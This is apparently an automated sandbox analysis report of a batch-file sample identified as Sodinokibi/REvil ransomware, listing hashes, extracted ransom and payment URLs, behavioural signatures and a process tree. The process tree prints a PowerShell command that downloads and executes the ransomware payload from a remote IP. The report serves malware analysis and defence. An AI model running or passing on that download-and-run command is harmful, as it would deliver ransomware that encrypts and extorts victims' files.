Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10 -
submitted
03-09-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
3ebef916c89bfab6725e5179bc66e52e.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
3ebef916c89bfab6725e5179bc66e52e.bat
Resource
win10
General
-
Target
3ebef916c89bfab6725e5179bc66e52e.bat
-
Size
220B
-
MD5
ffba72e711c822550ffada7128fa23c1
-
SHA1
8e0fecaddf1765771895425d408b902606e17e69
-
SHA256
0c2979fbb38e64c1f010da3bf048f308add447789e3490462a4a2914882501bc
-
SHA512
4863cc96608a32708f4843bdb275bedfd88435e55316a38ff22e4fbf7453fd194785a8c9f78efe55e3d3149e9dbdb284517a1d6d4f1bff25ea8abe457be7e1a7
Malware Config
Extracted
http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e
Extracted
C:\01p7fq-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E16582DF25936703
http://decryptor.cc/E16582DF25936703
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 75 IoCs
Processes:
powershell.exeflow pid process 8 804 powershell.exe 13 804 powershell.exe 15 804 powershell.exe 17 804 powershell.exe 19 804 powershell.exe 21 804 powershell.exe 23 804 powershell.exe 25 804 powershell.exe 27 804 powershell.exe 30 804 powershell.exe 33 804 powershell.exe 35 804 powershell.exe 37 804 powershell.exe 39 804 powershell.exe 41 804 powershell.exe 43 804 powershell.exe 45 804 powershell.exe 47 804 powershell.exe 49 804 powershell.exe 51 804 powershell.exe 53 804 powershell.exe 55 804 powershell.exe 56 804 powershell.exe 57 804 powershell.exe 58 804 powershell.exe 60 804 powershell.exe 62 804 powershell.exe 63 804 powershell.exe 65 804 powershell.exe 67 804 powershell.exe 69 804 powershell.exe 71 804 powershell.exe 73 804 powershell.exe 75 804 powershell.exe 77 804 powershell.exe 79 804 powershell.exe 81 804 powershell.exe 83 804 powershell.exe 85 804 powershell.exe 87 804 powershell.exe 89 804 powershell.exe 91 804 powershell.exe 93 804 powershell.exe 95 804 powershell.exe 97 804 powershell.exe 99 804 powershell.exe 101 804 powershell.exe 103 804 powershell.exe 105 804 powershell.exe 107 804 powershell.exe 109 804 powershell.exe 111 804 powershell.exe 113 804 powershell.exe 115 804 powershell.exe 117 804 powershell.exe 119 804 powershell.exe 122 804 powershell.exe 124 804 powershell.exe 126 804 powershell.exe 128 804 powershell.exe 130 804 powershell.exe 132 804 powershell.exe 134 804 powershell.exe 136 804 powershell.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\OutExport.tif => \??\c:\users\admin\pictures\OutExport.tif.01p7fq powershell.exe File renamed C:\Users\Admin\Pictures\SwitchProtect.tif => \??\c:\users\admin\pictures\SwitchProtect.tif.01p7fq powershell.exe File renamed C:\Users\Admin\Pictures\UnprotectCompress.tif => \??\c:\users\admin\pictures\UnprotectCompress.tif.01p7fq powershell.exe File opened for modification \??\c:\users\admin\pictures\EnterUnblock.tiff powershell.exe File renamed C:\Users\Admin\Pictures\EnterUnblock.tiff => \??\c:\users\admin\pictures\EnterUnblock.tiff.01p7fq powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9tzs299f233.bmp" powershell.exe -
Drops file in Program Files directory 22 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\01p7fq-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareRegister.vsdm powershell.exe File opened for modification \??\c:\program files\PushExpand.dot powershell.exe File opened for modification \??\c:\program files\SwitchRequest.aiff powershell.exe File opened for modification \??\c:\program files\RegisterProtect.wma powershell.exe File opened for modification \??\c:\program files\RemoveUndo.wmx powershell.exe File created \??\c:\program files\01p7fq-readme.txt powershell.exe File opened for modification \??\c:\program files\CompressResume.M2TS powershell.exe File opened for modification \??\c:\program files\ConfirmStep.odt powershell.exe File opened for modification \??\c:\program files\ConvertToUndo.jtx powershell.exe File opened for modification \??\c:\program files\FormatHide.doc powershell.exe File opened for modification \??\c:\program files\ProtectStep.mov powershell.exe File opened for modification \??\c:\program files\UnlockPop.dotx powershell.exe File opened for modification \??\c:\program files\InitializeSync.xsl powershell.exe File opened for modification \??\c:\program files\RepairConnect.aifc powershell.exe File opened for modification \??\c:\program files\SaveExit.vdx powershell.exe File opened for modification \??\c:\program files\CheckpointAdd.ogg powershell.exe File opened for modification \??\c:\program files\DisconnectFormat.wax powershell.exe File opened for modification \??\c:\program files\FormatSearch.dwg powershell.exe File opened for modification \??\c:\program files\MoveCopy.xlsm powershell.exe File opened for modification \??\c:\program files\RegisterUninstall.js powershell.exe File opened for modification \??\c:\program files\SwitchNew.htm powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = ec84d4173682d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 804 powershell.exe 804 powershell.exe 804 powershell.exe 804 powershell.exe 804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 1180 svchost.exe Token: SeCreatePagefilePrivilege 1180 svchost.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeDebugPrivilege 804 powershell.exe Token: SeTakeOwnershipPrivilege 804 powershell.exe Token: SeBackupPrivilege 3968 vssvc.exe Token: SeRestorePrivilege 3968 vssvc.exe Token: SeAuditPrivilege 3968 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2784 wrote to memory of 804 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 804 2784 cmd.exe powershell.exe PID 2784 wrote to memory of 804 2784 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3ebef916c89bfab6725e5179bc66e52e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e');Invoke-BBWAIYOYNUVEV;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3968